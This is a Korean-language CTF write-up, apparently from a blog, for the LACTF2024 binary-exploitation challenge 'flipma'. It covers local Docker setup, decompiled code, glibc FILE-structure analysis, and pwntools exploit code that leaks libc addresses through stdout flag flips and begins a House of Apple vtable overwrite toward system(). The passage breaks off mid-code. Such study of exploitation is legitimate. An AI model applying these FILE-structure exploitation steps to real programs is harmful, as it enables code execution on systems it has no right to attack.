{"id":3359,"date":"2025-04-20T14:05:03","date_gmt":"2025-04-20T05:05:03","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3359"},"modified":"2025-04-20T14:32:43","modified_gmt":"2025-04-20T05:32:43","slug":"lactf2024-flipma","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3359","title":{"rendered":"[LACTF2024] flipma"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ checksec .\/flipma\n[*] '\/home\/seo\/study\/LACTF2024\/flipma\/flipma'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Docker configure<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo docker build . -t flipma\nsudo docker run -it --rm --privileged --security-opt seccomp=unconfined -p 1337:1337 flipma sh<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ nc -lp 1338 > libc.so.6\n\nseo@seo:~\/study\/LACTF2024\/flipma$ nc -lp 1338 > ld-linux-x86-64.so.2<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Guest<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/lib # cat libc.so.6 | nc 172.17.0.1 1338\n\n\/lib # cat ld-linux-x86-64.so.2  | nc 172.17.0.1 1338<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><s>ubuntu 20.04 \ud658\uacbd \ud544\uc694<\/s> <s>\ub3c4\ucee4\uc5d0\uc11c \ud658\uacbd \uad6c\ucd95\ud558\ub294\uac78\ub85c\u2026<\/s> \uc6b0\ubd84\ud22c 20.04 LTS \ud658\uacbd\uc73c\ub85c \ubcc0\uacbd<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ strings -tx .\/flipma\n...\n   3014 GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\n...<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Dropbear\/gdbserver in Docker<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo docker build . -t flipma\nsudo docker run -it --rm --privileged --security-opt seccomp=unconfined -p 1337:1337 -p 22222:22222 -p 12345:1234 flipma sh<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Guest<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/bin \n \nnc -lvp 1337 > gdbserver\n \nnc -lvp 1337 > gdb\n \nnc -lvp 1337 > dropbearmulti\n\nln -sf dropbearmulti dropbear\nln -sf dropbearmulti dbclient\nln -sf dropbearmulti dropbearkey\nln -sf dropbearmulti dropbearconvert\nln -sf dropbearmulti ssh\n\nmkdir -p \/etc\/dropbear\ndropbearkey -t rsa   -f \/etc\/dropbear\/dropbear_rsa_host_key\ndropbearkey -t dss   -f \/etc\/dropbear\/dropbear_dss_host_key\ndropbearkey -t ecdsa -f \/etc\/dropbear\/dropbear_ecdsa_host_key\nchmod 600 \/etc\/dropbear\/*\n\npasswd root\n#0000\n\ndropbear -p 22222<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host<\/li>\n<\/ul>\n\n\n\n<p>static \ube4c\ub4dc gdb, gdbserver, dropbearmulti \ub2e4\uc6b4\ub85c\ub4dc \ub9c1\ud06c<br><a href=\"https:\/\/github.com\/guyush1\/gdb-static\/releases\/tag\/v16.2-static\">https:\/\/github.com\/guyush1\/gdb-static\/releases\/tag\/v16.2-static<\/a><br><a href=\"https:\/\/bitfab.org\/dropbear-static-builds\">https:\/\/bitfab.org\/dropbear-static-builds<\/a><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat gdbserver | nc 127.0.0.1 1337\n\ncat gdb | nc 127.0.0.1 1337\n\ncat dropbearmulti | nc 127.0.0.1 1337<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Running prob in Docker<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">while true;\ndo\nnc -lvp 1337 -e \/srv\/app\/run\ndone<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompile src<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<p>flips\uc758 \uac12\uc5d0 \ub530\ub77c \uacc4\uc18d flip\uc744 \ud638\ucd9c\ud560 \uc218 \uc788\uc74c.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  while ( flips > 0 )\n    flip();\n  puts(\"no more flips\");\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">flip<\/h3>\n\n\n\n<p>flip \ud568\uc218\ub97c \ud638\ucd9c\ud560\ub54c\ub9c8\ub2e4 \ub9c8\uc9c0\ub9c9\uc5d0 flips\uc218\ub97c \uac10\uc18c\ud568. \uc804\uc5ed\ubcc0\uc218\uc778 flips \ucd08\uae30\uac12\uc740 4\uc774\ubbc0\ub85c, \ucd1d 4\ubc88 \ud638\ucd9c\uac00\ub2a5.<\/p>\n\n\n\n<p>\uac01\uac01 a, b \uac12\uc744 v1, v2\uc5d0 \ub2f4\uc74c. <br><code>stdin-&gt;_flags<\/code>\uc758 \ud3ec\uc778\ud130\uc5d0 <code>v1<\/code> \uac12\uc744 \ub354\ud55c \ub4a4, \uadf8 \ub354\ud55c \uacb0\uacfc\uc758 \ud3ec\uc778\ud130 \uac12\uacfc <code>v2<\/code> \uac12\uc744 1\uacfc \uc67c\ucabd \uc2dc\ud504\ud2b8\ud55c \uac12\uc744 xor \uc5f0\uc0b0.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int flip()\n{\n  __int64 v1; \/\/ [rsp+10h] [rbp-10h]\n  unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n  write(1, \"a: \", 3u);\n  v1 = readint();\n  write(1, \"b: \", 3u);\n  v2 = readint();\n  if ( v2 >= 8 )\n    return puts(\"we're flipping bits, not burgers\");\n  *((_BYTE *)&amp;stdin->_flags + v1) ^= 1 &lt;&lt; v2;\n  return --flips;\n}\n\n__int64 readint()\n{\n  char buf[24]; \/\/ [rsp+0h] [rbp-20h] BYREF\n  unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n  v2 = __readfsqword(0x28u);\n  read(0, buf, 16u);\n  return atol(buf);\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis<\/h3>\n\n\n\n<p><strong>\ud658\uacbd: leak\uc774 \ub418\uc9c0 \uc54a\uc544 Ubuntu 20.04 LTS\ub85c \ubcc0\uacbd.<\/strong><\/p>\n\n\n\n<p>FILE \ud3ec\uc778\ud130 \uad6c\uc870\uccb4.<\/p>\n\n\n\n<p><code>$ cat \/usr\/include\/x86_64-linux-gnu\/bits\/types\/struct_FILE.h<\/code><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">struct _IO_FILE\n{\n  int _flags;           \/* High-order word is _IO_MAGIC; rest is flags. *\/\n\n  \/* The following pointers correspond to the C++ streambuf protocol. *\/\n  char *_IO_read_ptr;   \/* Current read pointer *\/\n  char *_IO_read_end;   \/* End of get area. *\/\n  char *_IO_read_base;  \/* Start of putback+get area. *\/\n  char *_IO_write_base; \/* Start of put area. *\/\n  char *_IO_write_ptr;  \/* Current put pointer. *\/\n  char *_IO_write_end;  \/* End of put area. *\/\n  char *_IO_buf_base;   \/* Start of reserve area. *\/\n  char *_IO_buf_end;    \/* End of reserve area. *\/\n\n  \/* The following fields are used to support backing up and undo. *\/\n  char *_IO_save_base; \/* Pointer to start of non-current get area. *\/\n  char *_IO_backup_base;  \/* Pointer to first valid character of backup area *\/\n  char *_IO_save_end; \/* Pointer to end of non-current get area. *\/\n\n  void *_markers;\n\n  void *_chain;\n\n  int _fileno;\n  int _flags2;\n  uint64_t _old_offset; \/* This used to be _offset but it's too small.  *\/\n\n  \/* 1+column number of pbase(); 0 is unknown. *\/\n  unsigned short _cur_column;\n  signed char _vtable_offset;\n  char _shortbuf[1];\n\n  void *_lock;\n  uint64_t _offset;\n  \/* Wide character stream stuff.  *\/\n  void *_codecvt;\n  void *_wide_data;\n  void *_freeres_list;\n  void *_freeres_buf;\n  size_t __pad5;\n  int _mode;\n  \/* Make sure we don't get into trouble again.  *\/\n  char _unused2[20];\n};<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  p *(FILE *)0x00007ffff7fb1980\n$3 = {\n  _flags = 0xfbad208b,\n  _IO_read_ptr = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_read_end = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_read_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_ptr = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_end = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_buf_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_buf_end = 0x7ffff7fb1a04 &lt;_IO_2_1_stdin_+132> \"\",\n  _IO_save_base = 0x0,\n  _IO_backup_base = 0x0,\n  _IO_save_end = 0x0,\n  _markers = 0x0,\n  _chain = 0x0,\n  _fileno = 0x0,\n  _flags2 = 0x0,\n  _old_offset = 0xffffffffffffffff,\n  _cur_column = 0x0,\n  _vtable_offset = 0x0,\n  _shortbuf = \"\",\n  _lock = 0x7ffff7fb37f0 &lt;_IO_stdfile_0_lock>,\n  _offset = 0xffffffffffffffff,\n  _codecvt = 0x0,\n  _wide_data = 0x7ffff7fb1a60 &lt;_IO_wide_data_0>,\n  _freeres_list = 0x0,\n  _freeres_buf = 0x0,\n  __pad5 = 0x0,\n  _mode = 0x0,\n  _unused2 = '\\000' &lt;repeats 19 times>\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\uc218\uc8151.<\/h3>\n\n\n\n<p>_IO_2_1_stdout + 0x1 \uc9c0\uc810\uc744 \uc218\uc815<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"110\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53.png\" alt=\"\" class=\"wp-image-3360\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53.png 749w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53-300x44.png 300w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"751\" height=\"547\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54.png\" alt=\"\" class=\"wp-image-3361\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54.png 751w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54-300x219.png 300w\" sizes=\"auto, (max-width: 751px) 100vw, 751px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x20 ^ (1 &lt;&lt; 3))\n'0x28'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_flags<br>0x00000000fbad<strong>20<\/strong>87 \u2192 0x00000000fbad<strong>28<\/strong>87<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4   x\/gx 0x00007ffff7fb1980+0xd20\n0x7ffff7fb26a0 &lt;_IO_2_1_stdout_>:       0x00000000fbad2887<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\uc218\uc8152.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x28 ^ (1 &lt;&lt; 4))\n'0x38'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_flags<br>0x00000000fbad<strong>28<\/strong>87 \u2192 0x00000000fbad3<strong>8<\/strong>87<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  x\/gx 0x00007ffff7fb1980+0xd20\n0x7ffff7fb26a0 &lt;_IO_2_1_stdout_>:       0x00000000fbad3887<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\uc218\uc8153.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x27 ^ (1 &lt;&lt; 5))\n'0x7'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_IO_write_base<br>Before: _IO_write_base = 0x7ffff7fb<strong>27<\/strong>23 &lt;<em>IO_2_1_stdout<\/em>+131&gt; &#8220;&#8221;,<br>After: _IO_write_base = 0x7ffff7fb<strong>07<\/strong>23 &lt;xdrstdio_ops+35&gt; &#8220;\\367\\377\\177&#8221;,<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\uc218\uc8154. (\uc0ac\uc2e4\uc0c1 \uc218\uc815X)<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">puts(\"we're flipping bits, not burgers\") + (LEAK)<\/pre>\n\n\n\n<p>Before:<br>_IO_write_base = 0x7ffff7fb0723 &lt;xdrstdio_ops+35&gt; &#8220;\\367\\377\\177&#8221;,<\/p>\n\n\n\n<p>After puts:<br>_IO_write_base = 0x7ffff7fb2723 &lt;<em>IO_2_1_stdout<\/em>+131&gt; &#8220;\\n&#8221;,<\/p>\n\n\n\n<p><code>_flags<\/code>&nbsp;= 0xfbad3887 ( 0xfbad2887 |&nbsp;<code>_IO_IS_APPENDING<\/code>)<br>_IO_write_base = 0x7ffff7fb0723 \ud574\ub2f9 \uc8fc\uc18c\ubd80\ud130 LEAK\ub428.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">new_do_write<\/h3>\n\n\n\n<p>libc 2.31-0ubuntu9.17 \uc18c\uc2a4\ucf54\ub4dc \ub9c1\ud06c:<br><a href=\"https:\/\/launchpad.net\/ubuntu\/%2Bsource\/glibc\/2.31-0ubuntu9.17?utm_source=chatgpt.com\">https:\/\/launchpad.net\/ubuntu\/%2Bsource\/glibc\/2.31-0ubuntu9.17?utm_source=chatgpt.com<\/a><\/p>\n\n\n\n<p><code>_IO_IS_APPENDING (0x1000)<\/code> \ud50c\ub798\uadf8\uac00 SET\ub418\uba74,<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">static size_t\nnew_do_write (FILE *fp, const char *data, size_t to_do)\n{\n  size_t count;\n  if (fp->_flags &amp; _IO_IS_APPENDING)\n    \/* On a system without a proper O_APPEND implementation,\n       you would need to sys_seek(0, SEEK_END) here, but is\n       not needed nor desirable for Unix- or Posix-like systems.\n       Instead, just indicate that offset (before and after) is\n       unpredictable. *\/\n    fp->_offset = _IO_pos_BAD;\n  else if (fp->_IO_read_end != fp->_IO_write_base)\n    {\n      off64_t new_pos\n\t= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);\n      if (new_pos == _IO_pos_BAD)\n\treturn 0;\n      fp->_offset = new_pos;\n    }\n  count = _IO_SYSWRITE (fp, data, to_do);\n  if (fp->_cur_column &amp;&amp; count)\n    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;\n  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);\n  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;\n  fp->_IO_write_end = (fp->_mode &lt;= 0\n\t\t       &amp;&amp; (fp->_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))\n\t\t       ? fp->_IO_buf_base : fp->_IO_buf_end);\n  return count;\n}<\/pre>\n\n\n\n<p><code>_IO_2_1_stdout_-&gt;_IO_write_base<\/code> \ub0b4\uc6a9\uc774 LEAK\ub428<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">count = _IO_SYSWRITE (fp, \\\n_IO_2_1_stdout_->_IO_write_base, \\\n_IO_2_1_stdout_->_IO_write_ptr - _IO_2_1_stdout_->_IO_write_base); <\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Defeat ASLR<\/h3>\n\n\n\n<p>LEAK \uc2dc\uc791\uc810\uc740 _IO_write_base = 0x7ffff7fb0723.<br>ASLR \ube7c\uba74, 00000000001EB723.<\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c +0x825\uc2dc, stdout got \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0b4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.got:00000000001EBF48 stdout_ptr      dq offset stdout        ; DATA XREF: vprintf+4\u2191r\n.got:00000000001EBF48                                         ; printf+91\u2191r ...<\/pre>\n\n\n\n<p>\ud574\ub2f9 \uc8fc\uc18c\ub294 \ub2e4\uc2dc flipma \ubc14\uc774\ub108\ub9ac\uc758 stdout\uc744 \uac00\ub9ac\ud0b4.<br>0x4020\uc744 \ube7c\uba74 flipma base \uc8fc\uc18c \uad6c\ud558\uae30 \uac00\ub2a5.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  p\/x 0x007ffff7dc5000 + 0x0000000001EBF48\n$3 = 0x7ffff7fb0f48\ngef\u27a4  x\/gx 0x7ffff7fb0f48\n0x7ffff7fb0f48: 0x0000555555558020\ngef\u27a4  p\/x 0x0000555555558020-0x00555555554000\n$4 = 0x4020<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.bss:0000000000004020                 public stdout@@GLIBC_2_2_5\n.bss:0000000000004020 ; FILE *stdout\n.bss:0000000000004020 stdout@@GLIBC_2_2_5 dq ?                ; DATA XREF: main+1C\u2191r\n.bss:0000000000004020                                         ; LOAD:00000000000051D8\u2193o\n.bss:0000000000004020                                         ; Alternative name is 'stdout'\n.bss:0000000000004020                                         ; Copy of shared data\n<\/pre>\n\n\n\n<p>libc base LEAK\uc740 leak \uc2dc\uc791 +5\uc9c0\uc810\uc5d0\uc11c 0x157f10 \ube7c\uba74 \ub428.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.data.rel.ro:00000000001EB720                 dq offset sub_157F30\n.data.rel.ro:00000000001EB728                 dq offset sub_157F10<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))\n\nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\nleak = p.recvuntil(b\"we're\")\nlibc_base = u64(leak[5:5+8]) - 0x157f10 \nbin_base = u64(leak[0x825:0x825+8]) - 0x4020\nsuccess(f\"libc_base: {hex(libc_base)}\")\nsuccess(f\"bin_base: {hex(bin_base)}\")<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/LACTF2024\/flipma$ python3 solve.py\n[+] Starting local process '.\/flipma': pid 6991\n[+] libc_base: 0x7ffff7dc5000\n[+] bin_base: 0x555555554000\n[*] Switching to interactive mode\n flipping bits, not burgers\na: $<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Increase flips count<\/h3>\n\n\n\n<p>Before flips: 0x1<br>After flips: 0x81 (=129)<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">flips = bin_base + e.symbols[\"flips\"]\nlibc_stdin = libc_base + l.symbols[\"_IO_2_1_stdin_\"]\nsuccess(f\"flips: {hex(flips)}\")\nsuccess(f\"stdin: {hex(libc_stdin)}\")\n\nsla(\"a: \", str(flips - libc_stdin))\nsla(\"b: \", str(7))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> (0x1 ^ (1 &lt;&lt; 7))\n129<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">House of Apple by <strong>roderick01<\/strong><\/h3>\n\n\n\n<p><strong>1. \uac00\uc9dc <code>_wide_vtable<\/code> \uc0dd\uc131<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc704\uce58: <code>chunk_addr + 0x100<\/code><\/li>\n\n\n\n<li><code>__doallocate<\/code>\uc758 \uc624\ud504\uc14b\uc740 <code>0x68<\/code>\uc774\ubbc0\ub85c, <code>chunk_addr + 0x100 + 0x68<\/code>\uc5d0 <code>system<\/code> \uc8fc\uc18c\ub97c \uc800\uc7a5<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_FILE_plus *)->_wide_data = new_vtable\naaw(libc_stdout + 0xA0, new_vtable, libc_base + 0x1EC880)\n# (struct _IO_jump_t *)->__doallocate = system\naaw(new_vtable + 0x168, libc_base+l.symbols[\"system\"], 0)<\/pre>\n\n\n\n<p><strong>2. \uac00\uc9dc <code>_wide_data<\/code> \uc0dd\uc131<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc704\uce58: <code>chunk_addr<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_wide_vtable<\/code> \u2192 <code>chunk_addr + 0x100<\/code> (\uac00\uc9dc vtable\uc758 \uc8fc\uc18c)<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_wide_data*)->_wide_vtable = new_vtable + 0x100\naaw(new_vtable + 0xE0, new_vtable + 0x100, 